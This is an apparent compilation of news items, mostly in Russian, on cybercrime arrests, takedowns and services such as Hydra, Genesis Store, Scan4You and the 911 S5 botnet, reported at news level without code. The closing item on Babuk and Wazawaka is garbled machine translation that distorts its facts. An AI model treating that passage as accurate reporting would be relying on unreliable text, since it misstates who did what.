Несмотря на падение доходов, в 2022 году количество действующих уникальных штаммов программ-вымогателей резко возросло. Согласно исследованию компании Fortinet, в первой половине 2022 года было активно более 10 000 уникальных штаммов. Причём средний срок использования одного штамма продолжает сокращаться. Вероятно, это связано с тем, что компании по кибербезопасности оперативно вносят вредоносное ПО в свои реестры.
Майкл Филлипс, директор по претензиям компании Resilience, указал, что компаниям не следует расслабляться только из-за того, что доходы от программ- вымогателей упали. «Данные по претензиям в индустрии киберстрахования показывают, что программы-вымогатели остаются растущей киберугрозой для бизнеса и предприятий».
Билл Сигел из Coveware поделился статистическими данными о вероятности того, что жертва программы-вымогателя заплатит выкуп, исходя из клиентских дел его фирмы за последние четыре года.
С 2019 года уровень выплат жертвам упал с 76% до 41%. Но что именно объясняет этот сдвиг? Одним из важных факторов является то, что выплата выкупа стала более рискованной с юридической точки зрения, особенно после того, как в сентябре 2021 года OFAC опубликовало рекомендацию о возможности нарушения санкций при выплате выкупа. «С надвигающейся угрозой санкций существует дополнительная угроза юридических последствий для оплаты», — заявил Аллан Лиска, представитель компании Future Intelligence.
Еще одним важным фактором являются изменения в политике выплат страховых компаний, которые раньше обычно всегда возмещали жертвам выкупы для программ- вымогателей. «Страховые компании в последнее время действительно ужесточили правила, которые определяют, кого они будут страховать и на что могут быть использованы страховые платежи. Поэтому они гораздо реже позволяют своим клиентам получить страховую выплату за выкуп вымогателям», — сказал Лиска.
Филлипс озвучил такое мнение: «Сегодня компании должны соблюдать строгие меры кибербезопасности и резервного копирования, чтобы быть застрахованными от программ-вымогателей. Доказано, что эти требования эффективно помогают компаниям восстанавливаться после атак, а не платить выкуп».
Однако Лиска подчеркнул, что резервное копирование не является панацеей. Он отметил, что процесс восстановления данных может занять месяцы и сделать жертв программ-вымогателей уязвимыми для последующих атак. Чтобы не стать жертвой программы-вымогателя вышеупомянутый эксперт рекомендует организациям проводить периодические кабинетные учения, в ходе которых собирать руководителей абсолютно всех отделов компании и вместе размышлять, как организация может обеспечить свою безопасность. Выявить все уязвимости заранее и принять превентивные меры.
«Реальное представление о состоянии безопасности вашей организации, ее слабых и сильных сторонах — лучше подготовит всех на случай, если организация подвергнется атаке программы-вымогателя, а также проинформирует руководство о том, куда нужно инвестировать, чтобы повысить безопасность сети», — подытожил Лиска.
Таким образом, снижение доходов киберпреступников обусловлено многими факторами. Но одним из важнейших стало то, что всё больше и больше организаций основательно укрепляют безопасность своих сетей. Их работу банально труднее, чем раньше, нарушить действием программы-вымогателя. Регулярные бэкапы данных, усложнение аутентификации во внутренние системы, рекомендации по безопасности для сотрудников, совместные тренинги и мозговые штурмы — всё это может эффективно усилить кибербезопасность компании.
Остаётся надеяться, что такая же тенденция продолжится в будущем. Всё больше компаний будут задумываться о своей безопасности ещё «на берегу» и основательно укреплять её. Это поможет выстоять против любых атак и угроз.
Гражданина России Евгения Никулина после прохождения психиатрического обследования в Лос-Анджелесе до сих пор не перевели на постоянное место пребывания — в тюрьму Сан-Франциско. Сейчас россиянин, которого власти США обвиняют в киберпреступлениях, находится в частной тюрьме под Лас-Вегасом, где и ожидает трансфера. Об этом «Известиям» рассказал его адвокат Аркадий Бух. По словам источника «Известий», психиатрическое обследование установило: обвиняемый вменяем и способен участвовать в судебном процессе. Таким образом, россиянину Евгению Никулину в настоящий момент не приходится рассчитывать на перевод в РФ по состоянию здоровья. Тем не менее защита может на предстоящем слушании заявить об ошибке в отчете и попытаться доказать с помощью частных психиатров, что Никулин душевно болен и не в состоянии отстаивать свои интересы.
Евгения Никулина еще в начале декабря 2018 года перевели в госпиталь исправительного учреждения Metropolitan Detention Center в Лос-Анджелесе. Здесь он почти два месяца проходил психиатрическое обследование, назначенное американским судом. Экспертиза должна была установить степень вменяемости и способность россиянина предстать перед судом присяжных. Как пояснил адвокат Аркадий Бух, после обследования его клиента до сих пор не вернули в тюрьму города Сан-Франциско.
— Недавно мы узнали, что Евгений так и не доехал до своего постоянного места пребывания. Сейчас он находится в частной тюрьме рядом с Лас-Вегасом. Я знаю это пенитенциарное учреждение, и в целом там нормальное питание и условия по сравнению с другими американскими тюрьмами, — заявил «Известиям» Аркадий Бух.
Служба маршалов США — подразделение министерства юстиции США, ответственное в том числе за транспортировку федеральных заключенных и поиск беглецов, — не смогла перевести клиента вовремя в Сан-Франциско, добавил адвокат. В результате судья был вынужден назначить дополнительное заседание на 5 марта.
— В отсутствие Евгения не могли быть зачитаны результаты психиатрической экспертизы. Тем не менее 12 февраля судья убедился в том, что прокуратура и защита получили отчет о состоянии здоровья россиянина. Это очень длинный материал из 100 страниц. Там описывается личная жизнь человека и его душевное состояние. В целом речь идет о довольно интимных вещах, — подчеркнул адвокат, отказавшись раскрывать подробности документа. — Судья дал приказ защите провести переговоры с прокуратурой и обсудить, как действовать дальше.
Поводом для назначения психиатрического обследования стало «странное поведение» россиянина, который, по словам защиты, фактически игнорировал судебный процесс и проявлял к нему очевидное безразличие. Источник, близкий к расследованию дела Евгения Никулина, рассказал «Известиям», что, согласно результатам медицинской экспертизы, россиянин здоров и может принимать участие в судебном процессе.
— Он может идти на суд присяжных, так как душевное состояние Никулина в порядке. Это однозначно. В отчете все сказано черным по белому. Теперь есть несколько вариантов развития событий данного дела. Защита может на предстоящем слушании заявить об ошибочности отчета и попробовать доказать с помощью частных психиатров, что Евгений невменяем и не способен отстаивать свои интересы. Если это удастся, то адвокаты могут потребовать его немедленного перевода в Россию на лечение, — отметил он. — Или же гражданин РФ пойдет на суд присяжных. Здесь он может попытаться доказать свою невиновность или решиться на сделку с прокуратурой. Это обычная практика в США, когда обвиняемый, например, признает частичную вину и получает меньший срок, нежели тот, который ему угрожал изначально.
Евгений Никулин был задержан в 2016 году в Праге по запросу американских спецслужб. В США россиянина обвиняют в кибератаках на крупные компании. После ареста его направили в пражскую психиатрическую больницу «Богнице», где ему внутривенно вводили глюкозу вместо полноценной пищи и заставляли принимать сильные антипсихотические и противоэпилептические препараты. Защита россиянина заявляла, что он стал жертвой карательной психиатрии. Сам Евгений Никулин не раз утверждал, что американские спецслужбы требуют от него выдвинуть ложные свидетельства против самого себя и признаться во вмешательстве в выборы в США.
Чешские власти в марте 2018 года экстрадировали россиянина в Штаты, где ему грозит около 30 лет заключения. Прокуратура заявляет о миллионах пострадавших в связи с кражей личных данных с LinkedIn и других серверов. Дело находится в компетенции Федерального окружного суда Северного округа Калифорнии. До недавнего перевода россиянина содержали в одиночной камере городской тюрьме Сан-Франциско.
German law enforcement take down 47 crypto exchanges for money laundering
The Prosecutor General of Frankfurt am Main – Central Office for Combating Cybercrime (ZIT) – and the Federal Criminal Police Office (BKA) have shut down 47 Exchange Services hosted in Germany that have been used for criminal purposes. These were platforms on which conventional currencies and cryptocurrencies could be exchanged.
Press: https://www.bka.de/DE/Presse/Listen.../2024/Presse2024/240919_PM_finalexchange.html
From German Law Enforcement:
THIS WAS YOUR FINAL EXCHANGE!
This is for you, ransomware affiliates, botnet operators and darknet vendors:
For years, the operators of these criminal exchange services have led you to believe that their hosting cannot be found, that they do not store any customer data and that all data is deleted immediately after the transaction. An apparently unregulated hub allowing you to launch the proceeds of your criminal activities without fear of prosecution.
From our point of view: nothing but empty promises!
We have found their servers and seized them – development servers, production servers, backup servers. We have their data – and therefore we have your data. Transactions, registration data, IP addresses.
Our search for traces begins. See you soon.
Click to expand...
New website: https://finalexchange.de/en
Суд в Подмосковье приговорил основателя наркоплатформы Hydra Станислава Моисеева к пожизненному заключению за организацию и руководство крупнейшей в даркнете сетью по продаже наркотиков. Об этом сообщает областная прокуратура.
«Суд с учетом позиции государственного обвинителя прокуратуры Московской области приговорил организатора преступного сообщества Станислава Моисеева к пожизненному лишению свободы, со штрафом в размере 4 млн рублей», — говорится в telegram-канале прокуратуры. Соучастники преступления получили наказание в виде тюремного заключения на период от восьми до двадцати трех лет с наложением денежных взысканий на общую сумму в шестнадцать миллионов рублей.
Осужденные будут отбывать наказание в колониях строгого и особого режима. Помимо этого, судебным решением в пользу государства были конфискованы транспортные средства, земельные участки и другое недвижимое имущество, принадлежащее осужденным. Суд также решил сохранить арест на их имущество для обеспечения исполнения части приговора, касающейся штрафов. Решение суда еще не вступило в законную силу.
Hydra представляет собой торговую платформу в даркнете, ориентированную исключительно на русскоязычные страны. Этот маркетплейс был признан самым крупным, занимая по данным аналитической компании Chainalysis около 80% от общемирового объема выручки даркнет-рынков в 2021 году. Платформа начала свою работу в сети Tor в 2015 году. Согласно отчетам прокуратуры Германии, на Hydra было зарегистрировано примерно 17 миллионов клиентов и более 19 тысяч продавцов. В 2022 году магазин был закрыт.
ФБР арестовало двух хакеров из-за их расточительного образа жизни после
кражи 230млн$
Речь идет о 20-летнем Мэлоун Ламе и 21-летнем Жандиеле Серрано, обвиняемых в заговоре с целью кражи и отмывания более 230 миллионов долларов в криптовалюте с использованием криптовалютных бирж и сервисов микширования.
Немного подробнее о содеянном:
Как следует из материалов дела, 18 августа Лам, Серрано и их сообщники
осуществили успешную атаку, в ходе которой похитили более 4100 биткоинов у
жертвы из Вашингтона, округ Колумбия. На тот момент стоимость украденных
активов превышала 230 миллионов долларов. По данным следствия, злоумышленники
получили несанкционированный доступ к криптосчетам жертв и перевели средства
на свои криптокошельки, а затем занимались отмыванием украденных активов.
Следствие установило, что украденная криптовалюта была использована для финансирования роскошного образа жизни подозреваемых. Они тратили деньги на международные поездки, покупку дорогих автомобилей, элитных часов, дизайнерских сумок и развлечения в ночных клубах Лос-Анджелеса и Майами.
ФБР удалось задержать Лама и Серрано благодаря анализу их расточительных расходов и активности в социальных сетях, где их друзья случайно раскрыли их местоположение
https://www.justice[.]gov/usao-dc/pr/indictment-charges-two-230-million- cryptocurrency-scam
Ukrainian police have identified and arrested a 28-year-old man from Kyiv who’s suspected of aiding notorious Russian ransomware groups Conti and LockBit to carry out cyberattacks.
The Ukrainian Cyber police and investigators of the National Police discovered that the man specialized in software for masking computer viruses under the guise of safe files.
Russian hackers then used the disguised malware to infect computer networks and demand ransoms for decrypting the data.
“Thanks to his programming skills, the person involved was able to hide malicious software from the most popular antiviruses,” Ukrainian police[ described](https://www.npu.gov.ua/news/atakuvaly-providne-pidpryiemstvo-u- niderlandakh-ta-belhii-politseiski-vykryly-posobnyka-rosiiskykh- khakeriv?v=66694e55d248f) the man, who was born in Kharkiv region.
The Conti ransomware gang rewarded the hacker's services with cryptocurrency. In 2021, Conti used his malware to incapacitate computer networks in the Netherlands and Belgium.
Cybernews already reported that the Dutch National Cyber Security Center alerted the authorities about the perpetrator before the arrest.
The Ukrainian police claim that the defendant also aided LockBit. Bot ransomware gangs are some of the largest globally – they’re financially motivated and specialize in attacks against large enterprises.
During the raid, police seized computer equipment, mobile phones, and draft records. The investigation is ongoing, and the suspect could face up to 15 years in prison for unauthorized interference with computer systems. Additional charges are possible.
The arrest comes after law enforcement agencies disrupted the LockBit and Conti cartels at every level. In February, the FBI, Europol, and other authorities seized LockBit’s infrastructure, arrested several affiliates, unveiled the leadership, and recovered 7,000 decryption keys. Conti Group has been proclaimed dead.
via Cybernews
В ходе масштабной международной операции, организованной Министерством юстиции США, была нейтрализована ботнет-сеть 911 S5. Юньхэ Ван, главный оператор сети, арестован и обвинён в нескольких преступлениях. С 2014 по 2022 год он заработал около 99 миллионов долларов, продав доступ к зараженным компьютерам, связанным с более чем 19 миллионами уникальных IP-адресов, потратил эти деньги на автомобили, такие как Ferrari F8 Spider 2022 года, BMW i8, BMW X7 M50d и Rolls Royce, и купил недвижимость в разных уголках мира. Помимо конфискации активов на сумму примерно 30 миллионов долларов, власти также взяли под контроль более 70 серверов. Если его признают виновным по всем пунктам обвинения, Вану может грозить до 65 лет тюремного заключения.В операции также участвовали его партнёры Цзинпин Лю, занимавшийся отмыванием денег, и Янни Чжэн, доверенное лицо Вана.
https://www.justice[.]gov/opa/pr/91...-arrested-coordinated-international- operation

](https://www.chainalysis.com/blog/911-s5-botnet-arrest-ofac-sanctions/)
Authorities arrested Yunhe Wang for administering the 911 S5 botnet. OFAC also sanctioned Wang and identified several of his crypto addresses
www.chainalysis.com
](https://www.securitylab.ru/news/548704.php)
Как международная сеть прокси использовалась для кражи социальных выплат.
 www.securitylab.ru
"И США, и Россия требуют экстрадиции соратника Кремля. Заключенного в Сьоне тщательно охраняют, о чем свидетельствуют материалы его дела", - пишет швейцарское издание Tages-Anzeiger.
"В наручниках и с браслетом слежения на ноге, в сопровождении и под охраной многочисленных полицейских с автоматами наготове - так Владислав Клюшин описывает то, как его доставляли из тюрьмы в Сьоне на допрос. Мощное сопровождение предназначено для его защиты, объяснили ему в прокуратуре кантона Вале. Защиты от чего? "Мне угрожают?", - спросил Клюшин, согласно протоколу допроса. И если да, то кто? Ведомства опасаются покушения? Его жизнь в опасности даже в швейцарской тюрьме? Ответа на свои вопросы Клюшин не получил", - повествует издание.
"Клюшин является владельцем российской компании "М 13", которая занимается мониторингом и анализом СМИ с помощью специальной программы "Катюша", - поясняют авторы публикации. - Эта программа используется уже несколько лет и служит российским министерствам, а также пресс-службе Кремля, чтобы контролировать СМИ и быстро реагировать на критические сообщения".
"Клюшин поддерживает прекрасные отношения с Кремлем. По данным российского торгового реестра, в прошлом году компания "М 13" получила заказы на сумму около 17 млн швейцарских франков, почти четверть из них - от государственных органов и учреждений. Среди прочих, "Катюшу" использует министерство обороны России. Сам Клюшин определял роль своей компании как "стратегически важную для российского правительства", - говорится в статье.
"40-летний гражданин России Клюшин был арестован еще 21 марта, сразу после того, как он приземлился в Сьоне на частном самолете из Москвы вместе с женой и пятью детьми. По его собственным словам, он хотел провести отпуск со своей семьей в Церматте".
"То, чего не знал россиянин, выяснилось теперь из материалов расследования, имеющихся в распоряжении газеты: США держали его на прицеле и были в курсе его планов о поездке. За два дня до его вылета в Швейцарию они возбудили в отношении него уголовное дело по подозрению в интернет-мошенничестве и сговоре с целью взлома чужих компьютеров. На следующий день, то есть за день до вылета семьи Клюшиных в Сьон, американские власти направили Швейцарии запрос на арест Клюшина. Что и было сделано".
"19 апреля американские судебные органы направили в Швейцарию официальный запрос об экстрадиции Клюшина. Клюшин сопротивляется. Предложение о внесении залога в размере 1,5 млн швейцарских франков прокуратура Вале не приняла: по ее мнению, слишком велик риск побега. К тому же 1,5 млн франков "лишь немного превышают годовую зарплату заявителя". Апелляция против ареста, поданная в Федеральный уголовный суде в Беллинцоне, также была отклонена".
"Впрочем, по-видимому, не только американцы явно заинтересованы в том, чтобы заполучить узника из Сьона, - отмечает Tages-Anzeiger. - Через три недели после ареста Клюшина в Сьоне Россия также направила Швейцарии запрос об экстрадиции. Обоснование: в России якобы тоже ведется уголовное дело. Вопрос о том, действительно ли там уже велось расследование или оно было наспех сфабриковано, чтобы предотвратить выдачу россиянина американцам, остается открытым".
"Но почему Клюшина так тщательно охраняют в Швейцарии? Ведомства опасаются его похищения? Или того, что он может стать жертвой покушения, находясь под стражей? Ответственное федеральное ведомство юстиции не предоставило по этому поводу никакой информации. Посольство России в Берне лишь подтвердило газете, что заключенному оказывается "необходимая консульская поддержка для обеспечения его законных прав".
"В любом случае, реакция Клюшина была довольно необычной. В ходе допроса он заявил, что хочет быть депортирован в Россию в рамках упрощенной процедуры. И это несмотря на то, что в России ему грозит до десяти лет лишения свободы, в то время как в США - по его собственным словам - ему грозит только до пяти лет тюрьмы. Он также намекнул, что американское уголовное дело было возбуждено только из мести: потому что он якобы не захотел сотрудничать с западными спецслужбами".
"В письменном заявлении, составленном в тюрьме, Клюшин утверждает, что за последние годы с ним дважды выходили на связь. В первый раз это были представители американской разведки, в августе 2019 года на юге Франции. По словам Клюшина, тогда он притворился, что не понимает английского".
"Во второй раз, в марте 2020 года, в аэропорту Эдинбурга в Шотландии к нему подошли мужчина и женщина и попросили пройти в отдельную комнату. Там на плохом русском языке они представились сотрудниками британских спецслужб MI5 и MI6 и попросили его сотрудничать с ними. Но он отказался, пишет Клюшин в своем заявлении, после чего они пригрозили ему серьезными последствиями. Из-за этой предполагаемой попытки вербовки со стороны британцев швейцарский адвокат Клюшина усматривает политический мотив в запросе американцев об экстрадиции".
"В американском обвинительном заключении все выглядит иначе: Клюшин обвиняется в совершении серьезного экономического преступления. Предполагается, что в период с 2018 по 2020 год он через посредников получил доступ к защищенным паролями компьютерам, на которых хранились внутренние данные крупных американских компаний. Используя украденные данные и содержащиеся в них инсайдерские сведения, он якобы торговал акциями крупных корпораций, таких как IBM или Tesla, получая таким образом прибыль, исчисляемую десятками миллионов. Клюшин отрицает эти обвинения".
"Клюшин не только отец пятерых детей - он, по-видимому, также любит роскошную жизнь, с шикарными автомобилями в гараже и отпуском на частном самолете. Провести следующие несколько лет в одной из печально известных американских тюрем, вероятно, не совсем вписывается в его планы на будущее. То, что он предпочтет пойти на сделку, если его действительно экстрадируют из Швейцарии, и рассказать о сетях Кремля в обмен на смягчение наказания, не кажется совсем уж абсурдным. Возможно, этого опасаются и русские и поэтому направили Швейцарии собственный запрос об экстрадиции. Впрочем, 12 августа федеральное ведомство юстиции отклонило запрос России", - говорится в статье.
"Клюшин, в свою очередь, обвиняет швейцарские ведомства в том, что они получили доступ к его компьютеру, возможно, обработали данные и передали их властям США без его разрешения. В связи с этим 23 августа заключенный в Сьоне подал заявление в отношении неустановленных лиц".
"Все это немного похоже на холодную войну, - резюмирует Tages-Anzeiger. - Никто никому не доверяет, все считают друг друга способными на всё. Даже в тюрьме Сьона"
• Source: <https://www.tagesanzeiger.ch/hoechste-alarmstufe-um-einen-russen- in-schweizer-haft-618906699628>
В среду США предложили 10 млн долларов в качестве вознаграждения за гражданина России, обвиняемого в организации операций, связанных с кредитными картами, которые были украдены.
Кулькову Денису Геннадьевичу, по данным обвинительного заключения, раскрытым окружным судом Америки в Нью-Йорке, выдвинуто обвинение в мошеннических действиях с устройствами, в компьютерном вторжении и в отмывании денег, сообщает Tech Xplore.
Кульков, возрастом 43 года, обвиняется в том, что создал электронную платформу Try2CheckMe , помогающую кардерам подтверждать актуальность данных украденных кредитных карт, а именно - действительны ли они на момент проверки.
«Как таковая, Try2Check была основным посредником в торговле информацией об украденных кредитных картах, обрабатывая как минимум десятки миллионов номеров карт каждый год», - заявила прокуратура США по Восточному округу Нью-Йорка.
Она заявила, что Соединенным Штатам и партнерам в Австрии и Германии пришлось долго сотрудничать для того, чтобы вывести из Сети сайты преступной платформы Try2Check.
Как говорится в обвинительном заключении, платформу Try2Check Кульков создал предположительно в 2005 году и сделал ее основным инструментом торговли украденными кредитными картами незаконно.
Try2Check для проверки карт якобы получил доступ к серверам крупного платежного процессора США несанкционированно.
По данным прокуратуры США, Кульков заработал не менее 18 миллионов долларов через операцию Try2Check, купив Ferrari и другие предметы роскоши.
Потенциально Кулькову грозит до 20 лет лишения свободы.
source:
state.gov/u-s-department-of-state-announces-reward-offers-for-information-
leading-to-the-arrest-and-or-conviction-of-a-russian-cybercriminal-and-
identification-of-key-leaders-of-a-transnational-organized-crime
state.gov/denis-gennadievich-kulkov
techxplore.com/news/2023-05-mn-reward-alleged-russian-cybercriminal.html
justice[.]gov/usao-edny/pr/cybercriminal-network-fueling-global-stolen-credit-
card-trade-dismantled
Специалисты «Лаборатории Касперского» обнаружили в Сети крупнейший рынок краденых цифровых отпечатков ПК под названием Genesis Store. В настоящее время Genesis Store предлагает свыше 60 тыс. профилей, содержащих отпечатки браузеров, логины и пароли пользователей различных web-сайтов, файлы cookie и данные банковских карт.
В зависимости от ценности информации ее стоимость составляет от $5 до $200 за один профиль. К примеру, профиль с учетными данными для online-банкинга будет стоить дороже. По словам операторов Genesis Store для каждого профиля цена генерируется автоматически с помощью специального алгоритма.
Панель поиска в магазине оснащена разнообразными фильтрами, позволяющими находить профили по заданным характеристикам, таким как страна, операционная система, дата первого появления профиля в продаже и пр.
Для того чтобы максимально упростить для своих клиентов использование краденых профилей, администрация Genesis Store создала специальный плагин .crx для браузеров на базе Chromium. Плагин позволяет киберпреступникам устанавливать похищенные цифровые профили прямиком в свои браузеры и с помощью одного клика мыши превращаться в «цифровых двойников» жертв. Подключившись к прокси-серверу с указанием местоположения жертвы, мошенники смогут успешно обойти механизмы верификации в антифрод-системах и выдать себя за реального пользователя.
Магазин продает не только краденые цифровые отпечатки, но и сгенерированные с нуля. С помощью произвольных отпечатков киберпреступники могут, к примеру, вводить похищенные данные банковских карт в платежные формы на сайтах электронной коммерции в обход антифрод-систем.
Взято тут: https://www.securitylab.ru/news/498694.php
В Москве задержали британца, которого разыскивает Интерпол по запросу США.
По данным американцев, Christopher Emms Douglas помогал Северной Корее обходить санкции с помощью крипты.
Сотрудники российского бюро Интерпола задержали Кристофера Эммса прямо в хостеле, где он остановился. 31-летнего британца подозревают по статье о мошенничестве против правительства США, и в начале месяца международная уголовная полиция как раз выпустила по этому делу «красное уведомление» — то есть запрос об аресте.
Американский Минюст утверждает, что Эммс вместе с двумя сообщниками вступил в сговор, чтобы помочь Северной Корее обходить санкции США. По версии следствия, мужчины консультировали членов правительства КНДР, а Эммс подробно объяснял, как с с помощью крипты можно переводить деньги в любую страну мира. Также фигуранты дела устраивали целую блокчейн-конференцию в Пхеньяне.
Судя по всему, Эммс решил переждать неспокойные времена в России. После задержания его отправили под арест.
source: fbi.gov/wanted/counterintelligence/christopher-douglas-emms
Министерство юстиции США выдвинуло обвинение против четырех россиян, которые основали децентрализованную инвестиционную платформу Forsage. Они обвиняются в создании пирамиды на $340 млн.
Согласно судебным документам, Владимиру Охотникову под псевдонимом Lado, Олене Обламской (Lola Ferrari), Михаилу Сергееву (Mike Mooney, Gleb или Gleb Million) и Сергею Маслакову предъявлено обвинение в организованном мошенничестве с применением электронных средств и грозит до 20 лет тюрьмы каждому.
«Обвиняемые агрессивно продвигали Forsage через социальные сети в качестве лицензированной и прибыльной возможности для бизнеса. Также платформа рекламировалась как децентрализованный матричный проект, основанный на сетевом маркетинге и смарт-контрактах на блокчейне. При этом, сама платформа действовала как финансовая пирамида. Данная инвестиционная схема привлекла $340 млн от инвесторов по всему миру», ― подчеркивают представители Минюста США.
Как отметил специальный агент Иван Арвело (Ivan Arvelo) из отдела расследований национальной безопасности (HSI), обвиняемые «использовали модные технологии и непрозрачные формулировки для выманивания денег, но сами применили классическую схему Понци». Арвело напомнил, что технологии могут меняться, но схемы мошенничества остаются, поэтому правоохранительные органы продолжают их выявлять.
По обвинениям в сговоре с целью мошенничества с использованием электронных средств организаторам схемы грозит до 20 лет тюрьмы.
• Source: justice[.]gov/opa/pr/forsage-founders-indicted-340m-defi-crypto- scheme
Американский минюст заявил , что ликвидирована инфраструктура российского ботнета, известного как RSOCKS.
Как сообщается, операцию провели совместно США, Великобритания, Германия и Нидерланды. Сеть под названием RSOCKS объединяла миллионы взломанных компьютеров и других электронных устройств по всему миру.
В сообщении министерства говорится, что операцию по борьбе с хакерской сетью начали еще в 2017 году. Тогда выяснилось, что преступники взломали около 325 тыс. электронных устройств, многие из которых находились в округе Сан-Диего.
Ботнет изначально был рассчитан для использования в интернете вещей (IoT), но сеть удалось задействовать и на других типах устройств, в том числе на платформе Android, и на обычных компьютерах.
Расследование проводили американская прокуратура, ФБР, отдел по компьютерным преступлениям Минюста. Ни имен, ни количества задействованных в сети хакеров не раскрывают.
• Source: justice[.]gov/usao-sdca/pr/russian-botnet-disrupted-international- cyber-operation

6 декабря 2022 года в Telegram стала доступна регистрация в мессенджере без
физической СИМ-карты. На площадке Fragment примерно за 990 рублей (9 TON)
можно купить случайный анонимный номер +888 ХХХХ ХХХХ, собственность которого
реализована через NFT. Заплатив один раз, пользователь будет владеть номером,
пока не продаст его на аукционе. Инструкция, как купить анонимный виртуальный
номер +888 и регистрироваться в Telegram без СИМ-карты.
«Регистрация без СИМ-карты. При общении в Telegram Ваш номер телефона никогда
не был виден незнакомцам: наши пользователи сами решают, кому его показывать,
и могут запретить находить себя по номеру телефона. Сегодня начинается новая
эра конфиденциальности: аккаунт в Telegram теперь можно зарегистрировать без
сим-карты, воспользовавшись анонимными номерами на базе блокчейна. Приобрести
такие номера можно на платформе Fragment», — пояснили в Telegram.
Помимо элемента случайности можно выбрать на Fragment виртуальный номер +888 для регистрации в Telegram с красивыми цифрами. Такие номера продаются на аукционе уже за большие суммы, чем 9 TON.
Инструкция, как купить и продать никнейм Telegram на аукционе Fragment.
В конце ноября эксперты в свежей бета-версии мобильного клиента Telegram для Android обнаружили упоминание анонимных виртуальных телефонных номеров, которые можно будет купить на площадке Fragment. Эти номера будут начинаться с кода +888, позвонить на них будет нельзя. Они предназначены именно для работы с Telegram и используются для получения кодов подтверждения.
source: habr.com/ru/news/t/703928
Оператор сервиса Scan4You приговорен к 14 годам тюрьмы
Летом 2017 года правоохранительные органы США предъявили обвинения двум гражданам Латвии: Руслану Бондарю (Ruslans Bondars) и Юрию Мартышеву (Jurijs Martisevs). Их обвиняли в тайном сговоре с целью совершения электронного мошенничества, электронном мошенничестве, подстрекательстве к преступлению, а также в причинении вреда компьютерным системам. По данным Министерства юстиции США, эти двое много лет управляли Scan4You — сервисом для киберпреступников, с помощью которого те могли проверить свою малварь и узнать, «видят» ли ее антивирусные решения.
Подобные сервисы на Западе называют no distribute сканнерами. Принцип их работы аналогичен легитимному VirusTotal, с той лишь разницей, что нелегальные сканеры не делятся данными с производителями антивирусных продуктов и блокируют телеметрию. Такие ресурсы часто используют разработчики малвари, чтобы убедиться в том, что их пейлоад не вызывает срабатывания защитных решений и механизмов.
Согласно данным специалистов Trend Micro, также опубликованным в прошлом году, Бондарь создал Scan4You еще в 2009 году, и его сервис быстро стал одни из популярнейших в данной области рынка.
Хотя операторы Scan4You запрещали своему детищу информировать антивирусные движки о сканах файлов, в 2012 году они допустили ошибку: забыли запретить доклады о сканах URL для движка Trend Micro. В итоге специалисты компании несколько лет собирали данные сканов о репутации URL от Scan4You и других подобных сервисов, что помогало обнаруживать кампании по распространению малвари еще до их запуска. В конечном счете, аналитикам удалось собрать достаточно информации, чтобы передать эти наработки ФБР и другим правоохранительным органам.
Согласно обвинительному акту, составленному сотрудниками Министерства юстиции США, у ресурса было более 30 000 клиентов, и он являлся одним из крупнейших в своем роде. Известно, что сканер хостился в Amazon Web Services, а оплату администраторы принимали через PayPal, зарегистрированный на Мартышева. Это обстоятельство тоже помогло связать Scan4You с его операторами.
Из документов также следует, что злоумышленники выполняли разные обязанности. Так, Бондарь возглавлял «предприятие» и занимался поддержанием инфраструктуры сканера и технической стороной дела, тогда как Мартышев осуществлял техническую поддержку клиентов через ICQ, Skype, Jabber и электронную почту.
Еще в мае 2018 года суд присяжных признал Бондаря виновным. Однако приговор оператору Scan4You был вынесен лишь в конце пришлой недели, 21 сентября 2018 года. Бондаря приговорили к 14 годам тюремного заключения.
При этом специалисты Trend Micro утверждают, что создатель Scan4You занимался и другой нелегальной деятельностью. Так, по их данным, Бондарь также входил в состав группировки Eva Pharmacy, которая в середине «нулевых» была одним из крупнейших игроков в сфере фармацевтического спама. Кроме того, исследователи считают, что до создания Scan4You Бондарь имел отношение к распространению известных банковских троянов SpyEye и ZeuS.
Российская компания «Интернет-поиск» совместно с компанией T.Hunter разработала сервис, который позволяет находить пользователя Telegram по его IP-адресу.
Глава «Интернет-поиска» Игорь Бедеров заявил, что «произвести идентификацию человека можно благодаря возможности собирать большие данные, выделять отдельные запросы, отсеивать лишние данные, например, другие регионы, данные конечных устройств, с которых он выходит в Сеть, информации об операционной системе и о том, на какой сайт заходил и так далее».
По его словам, это возможно благодаря логам, которые хранит каждый сайт (устройство пользователя, его соединение, IP-адрес и так далее). В настоящее время к сервису поиска аккаунта человека в Telegram по IP подключено 64 различных источника данных. Они получают информацию с нескольких десятков «собственных сайтов», а также больше года собирают цифровые следы из Telegram с привязкой к пользователю, как объяснил OSINT-исследователь T.Hunter Владимир Макаров.
В итоге в сервисе накопились данные о более чем 6 млн человек. Найти конкретного пользователя можно, если ввести его IP-адрес в системе поиска.
По данным MediaScope, в июне 2022 в России насчитывалось 20,7 млн пользователей Telegram.
В 2019 году Telegram обвинили в раскрытии номеров телефонов участников протестных акций в Гонконге. Компания признала баг с утечкой конфиденциальных данных, но пояснила, что это фича. Она позволяла полиции генерировать контакт- лист с тысячами телефонных номеров по порядку, добавляться в группу протестующих и смотреть, какие пользователи из контакт-листа уже есть в группе. При этом схему можно было легко автоматизировать для перебора большого количества телефонных номеров.
money anywhere as there is in ransomware' ](https://therecord.media/an- interview-with-initial-access-broker-wazawaka-there-is-no-such-money-anywhere- as-there-is-in-ransomware/)
Wazawaka talked to Recorded Future analyst and product manager Dmitry Smilyanets about his interaction with other hackers, details about ransomware attacks he's been involved in, and how he settled on the name Babuk.
therecord.media
Примечание редактора: в прошлом году группа программ-вымогателей пригрозила разоблачить полицейских осведомителей и другую конфиденциальную информацию, если столичное полицейское управление Вашингтона не выполнит требования.
Наглая атака была делом рук банды, взятой как Бабук, которая в начале 2021 года приобрела легализацию за размещение на своем веб-сайте украденных баз данных от жертв, отказавшихся выкупить. Всего через несколько дней после появления вымогательства в столичном полицейском управлении Бабук объявил, что закрывает свою партнерскую программу по борьбе с вымогателями, и вместо этого сосредоточивается на краже данных и вымогательстве.
Ранее в этом году журналист по кибербезопасности Брайан Кребс раскрыл подробности о человеке, стоявшем на страже безопасности, по имени Михаил Матвеев, который также был связан с рядом других групп и личностей, включая псевдоним « Вазавака ». По словам Кребса, Матвеев стал более неуравновешенным , чем обычно, «публикуя причудливые селфи-видео» и обнаруживая учетную запись в Твиттере, чтобы распространить кодом эксплойта.
